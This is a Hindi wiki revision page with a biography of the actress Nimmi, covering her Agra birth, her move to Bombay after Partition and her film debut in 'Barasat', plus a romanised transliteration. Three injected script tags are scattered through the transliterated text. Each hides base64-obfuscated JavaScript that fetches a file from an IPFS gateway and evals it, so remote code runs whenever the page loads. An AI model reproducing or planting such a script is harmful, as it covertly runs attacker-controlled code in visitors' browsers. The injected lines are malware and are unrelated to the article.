Difference between revisions of "निम्मी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''निम्मी''' (जन्म- 18 फ़रवरी, 1933, आगरा, उत्तर प्रदेश) ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''निम्मी''' (जन्म- [[18 फ़रवरी]], [[1933]], [[आगरा]], [[उत्तर प्रदेश]]) भारतीय [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक रही हैं। उनका असली नाम 'नवाब बानू' था। बॉलीवुड की इस मासूम-सी खूबसूरत अभिनेत्री का [[राज कपूर]] ने फिल्‍मी दुनिया से परिचय करवाया था। हालांकि निम्‍मी की फिल्‍मी शुरुआत सहायक अभिनेत्री के तौर पर राज कपूर और नर्गिस अभिनीत फिल्‍म 'बरसात' ([[1949]]) से हुई थी। दिलचस्‍प बात तो यह भी है कि इस खूबसूरत अभिनेत्री पर राज कपूर की नज़र उस समय पड़ी, जब वे एक फिल्‍म की शूटिंग देख रही थीं। निम्मी अपनी समकालीन नायिकाओं [[मधुबाला]], [[नर्गिस]], [[नूतन]], [[मीना कुमारी]], [[सुरैया]] और गीता बाली के समान ही प्रतिभाशाली थीं।
+
'''निम्मी''' (जन्म- [[18 फ़रवरी]], [[1933]], [[आगरा]], [[उत्तर प्रदेश]]) भारतीय [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक रही हैं। उनका असली नाम 'नवाब बानू' था। बॉलीवुड की इस मासूम-सी खूबसूरत अभिनेत्री का [[राज कपूर]] ने फ़िल्मी दुनिया से परिचय करवाया था। हालांकि निम्‍मी की फ़िल्मी शुरुआत सहायक अभिनेत्री के तौर पर राज कपूर और [[नर्गिस]] अभिनीत फ़िल्म 'बरसात' ([[1949]]) से हुई थी। दिलचस्‍प बात तो यह भी है कि इस खूबसूरत अभिनेत्री पर राज कपूर की नज़र उस समय पड़ी, जब वे एक फ़िल्म की शूटिंग देख रही थीं। निम्मी अपनी समकालीन नायिकाओं [[मधुबाला]], [[नर्गिस]], [[नूतन]], [[मीना कुमारी]], [[सुरैया]] और गीता बाली के समान ही प्रतिभाशाली थीं।
 +
{{tocright}}
 +
==जन्म==
 +
अभिनेत्री निम्मी का जन्म 18 फ़रवरी, 1933 को [[आगरा]] में हुआ था। उनकी [[माँ]] का नाम वहीदन था, जो अपने दौर की मशहूर गायिका और अभिनेत्री थीं। निम्मी के [[पिता]] अब्दुल हकीम मिलिट्री में ठेकेदार थे। जब निम्मी केवल नौ वर्ष की थीं, तब इनकी माँ का स्वर्गवास का हो गया। उनके पिता ने निम्मी को ऐबटाबाद<ref>अब पाकिस्तान में</ref>रहने के लिए दादी के पास भेज दिया। निम्मी के पिता स्वयं आगरा छोड़ कर [[मेरठ]] आ गये।
 +
====मुम्बई आगमन====
 +
सन [[1947]] में [[भारत]] और [[पाकिस्तान]] के विभाजन के बाद शरणार्थियों की भीड़ में निम्मी और उनकी दादी भी थीं। निम्मी अपनी दादी के साथ [[बम्बई]] (वर्तमान मुम्बई) आ गयीं, जहाँ उनकी मौसी ज्योति रहती थीं, जो की [[हिन्दी]] फिल्मों में काम करती थीं। अब बम्बई निम्मी का नया आशियाना था, जहाँ एक रिफ्यूजी लड़की इतिहास के पन्नों में अपना नाम दर्ज करवाने के लिए तैयार थी।
 +
==फ़िल्मी शुरुआत==
 +
सन [[1948]] में प्रसिद्ध फिल्म निर्माता-निर्देशक महबूब ख़ान, सेंट्रल स्टूडियो बम्बई में अपनी फिल्म 'अंदाज़' की शूटिंग कर रहे थे। 'अंदाज़' में [[दिलीप कुमार]] और [[राज कपूर]] के साथ थीं [[नर्गिस]]। इन तीनों ने पहली और आखिरी बार एक साथ काम किया था। निम्मी भी यहाँ मौजूद थीं। वह अक्सर शूटिंग देखने आती थीं। यहीं उन्हें राज कपूर ने देखा। उन दिनों राज कपूर फ़िल्म 'बरसात' ([[1949]]) के लिए एक नए चेहरा तलाश रहे थे। 'अंदाज' के सेट पर निम्मी का शर्मीला व्यवहार देखने के बाद 'बरसात' में अभिनेता [[प्रेम नाथ]] के साथ निम्मी को ले लिया गया। 'बरसात' में निम्मी हृदयहीन शहरी प्रेम नाथ आदमी को प्यार करती है। निम्मी ने मासूम पहाड़ी गड़ेरिन की भूमिका निभाई थी।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 13:19, 30 December 2012

nimmi (janm- 18 faravari, 1933, agara, uttar pradesh) bharatiy hindi filmoan ki prasiddh abhinetriyoan mean se ek rahi haian. unaka asali nam 'navab banoo' tha. b aaulivud ki is masoom-si khoobasoorat abhinetri ka raj kapoor ne filmi duniya se parichay karavaya tha. halaanki nimh‍mi ki filmi shuruat sahayak abhinetri ke taur par raj kapoor aur nargis abhinit film 'barasat' (1949) se huee thi. dilachash‍p bat to yah bhi hai ki is khoobasoorat abhinetri par raj kapoor ki nazar us samay p di, jab ve ek film ki shootiang dekh rahi thian. nimmi apani samakalin nayikaoan madhubala, nargis, nootan, mina kumari, suraiya aur gita bali ke saman hi pratibhashali thian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

janm

abhinetri nimmi ka janm 18 faravari, 1933 ko agara mean hua tha. unaki maan ka nam vahidan tha, jo apane daur ki mashahoor gayika aur abhinetri thian. nimmi ke pita abdul hakim militri mean thekedar the. jab nimmi keval nau varsh ki thian, tab inaki maan ka svargavas ka ho gaya. unake pita ne nimmi ko aibatabad[1]rahane ke lie dadi ke pas bhej diya. nimmi ke pita svayan agara chho d kar merath a gaye.

mumbee agaman

san 1947 mean bharat aur pakistan ke vibhajan ke bad sharanarthiyoan ki bhi d mean nimmi aur unaki dadi bhi thian. nimmi apani dadi ke sath bambee (vartaman mumbee) a gayian, jahaan unaki mausi jyoti rahati thian, jo ki hindi philmoan mean kam karati thian. ab bambee nimmi ka naya ashiyana tha, jahaan ek riphyooji l daki itihas ke pannoan mean apana nam darj karavane ke lie taiyar thi.

filmi shuruat

san 1948 mean prasiddh philm nirmata-nirdeshak mahaboob khan, seantral stoodiyo bambee mean apani philm 'aandaz' ki shootiang kar rahe the. 'aandaz' mean dilip kumar aur raj kapoor ke sath thian nargis. in tinoan ne pahali aur akhiri bar ek sath kam kiya tha. nimmi bhi yahaan maujood thian. vah aksar shootiang dekhane ati thian. yahian unhean raj kapoor ne dekha. un dinoan raj kapoor film 'barasat' (1949) ke lie ek ne chehara talash rahe the. 'aandaj' ke set par nimmi ka sharmila vyavahar dekhane ke bad 'barasat' mean abhineta prem nath ke sath nimmi ko le liya gaya. 'barasat' mean nimmi hridayahin shahari prem nath adami ko pyar karati hai. nimmi ne masoom paha di g derin ki bhoomika nibhaee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. ab pakistan mean

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>